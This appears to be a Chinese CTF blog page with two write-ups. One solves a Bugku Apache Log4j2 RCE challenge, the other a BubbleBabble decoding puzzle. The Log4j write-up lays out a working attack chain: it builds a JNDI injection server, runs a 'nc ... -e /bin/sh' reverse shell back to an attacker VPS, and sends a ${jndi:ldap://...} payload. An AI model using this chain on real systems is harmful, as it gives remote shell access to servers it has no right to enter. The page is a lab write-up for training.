首页
关于站长
vFREE&资源
vFREE&导航
vFREE&友人帐
留言区
推荐
自由公式CTF
轻简导航
vFREE&网盘
Search
1
传说中的Windows11初体验(附下载链接和检测工具)
5,180 阅读
2
他的更多信息😋
1,917 阅读
3
MySQL中常见的内些...啥
1,189 阅读
4
非常菜的一个批量布置waf脚本
1,035 阅读
5
初始化一个Git仓库
880 阅读
其他知识
Linux
Windows
MySQL
Git
WriteUp
ctfshow
bugku
bmzctf
其他WP
CTF
Web
Crypto
Misc
AWD
漏洞复现
工具
Typecho
登录
Search
标签搜索
ctf
mysql
CTF-AWD
BMZCTF-WP
brixelctf
Bugku
Windows11
windows
web
web漏洞
xxe
web安全
vFREE
累计撰写
76
篇文章
累计收到
779
条评论
首页
栏目
其他知识
Linux
Windows
MySQL
Git
WriteUp
ctfshow
bugku
bmzctf
其他WP
CTF
Web
Crypto
Misc
AWD
漏洞复现
工具
Typecho
页面
关于站长
vFREE&资源
vFREE&导航
vFREE&友人帐
留言区
推荐
自由公式CTF
轻简导航
vFREE&网盘
搜索到
2
篇与
的结果
2021-12-15
Bugku---Apache Log4j2 RCE
1.bugku---Apache Log4j2 RCE1.1 打开题目注意:描述中的命令后面跟的×说明不支持这个命令,√则代表可以使用1.2 构建一个JNDI服务Github: https://github.com/welk1n/JNDI-Injection-Exploit1.2.1 构建1.cd JNDI-Injection-Exploit 2.mvn clean package -DskipTests 3.java -jar target/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "命令" -A "VPS_IP"1.3 运行JNDI服务java -jar target/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "nc [vps_ip] [vps_port] -e /bin/sh" -A [vps_ip]vps_ip : 你的服务器ipvps_port : 监听的端口,用来接收反弹的shell1.3.1payloadpayload构造不需要经过base64编码,直接用nc xxx.xxx.xxx.xxx port -e /bin/sh即可,把-e /bin/sh放在最后面,题目描述中的×说明了不能使用,但是可以使用/bin/sh1.4 启动一个nc监听nc -lvp 12341.5 ATTACK选择下图中任意一条"JNDI Links"(即粉红色字体的url)${jndi:[攻击payload]}比如: ${jndi:ldap://xxx.xxx.xxx.xxx:1389/zlfd1h}1.6 反弹shell获取flagsubmit flag更多log4j的漏洞信息见 :http://vfree.ltd/index.php/archives/379.html我的博客即将同步至腾讯云+社区,邀请大家一同入驻:https://cloud.tencent.com/developer/support-plan?invite_code=1o0onbcvlj87b
2021年12月15日
114 阅读
0 评论
0 点赞
2021-06-16
Bugku--EN-气泡
题目WP下载题目,得到一个txt文件打开文件发现一堆我看不明白的东西...刚开始题目出来的时候不知道是啥意思,然后看了一下群,提示说气泡的EN,也就是Bubble,百度一下Bubble解码,很稀少,现在很多网站可以解码,在我博客中也有这个工具BubbleBabble在线解码 解码网站站内:站内网站sleye:ctf.ssleye.com解码结果直接复制进去即可解码,有多层嵌套,最终flag是bugku{}的形式{lamp/}{callout color="#f0ad4e"}注:部分图片源自于网络,如有侵权,{/callout}
2021年06月16日
108 阅读
0 评论
0 点赞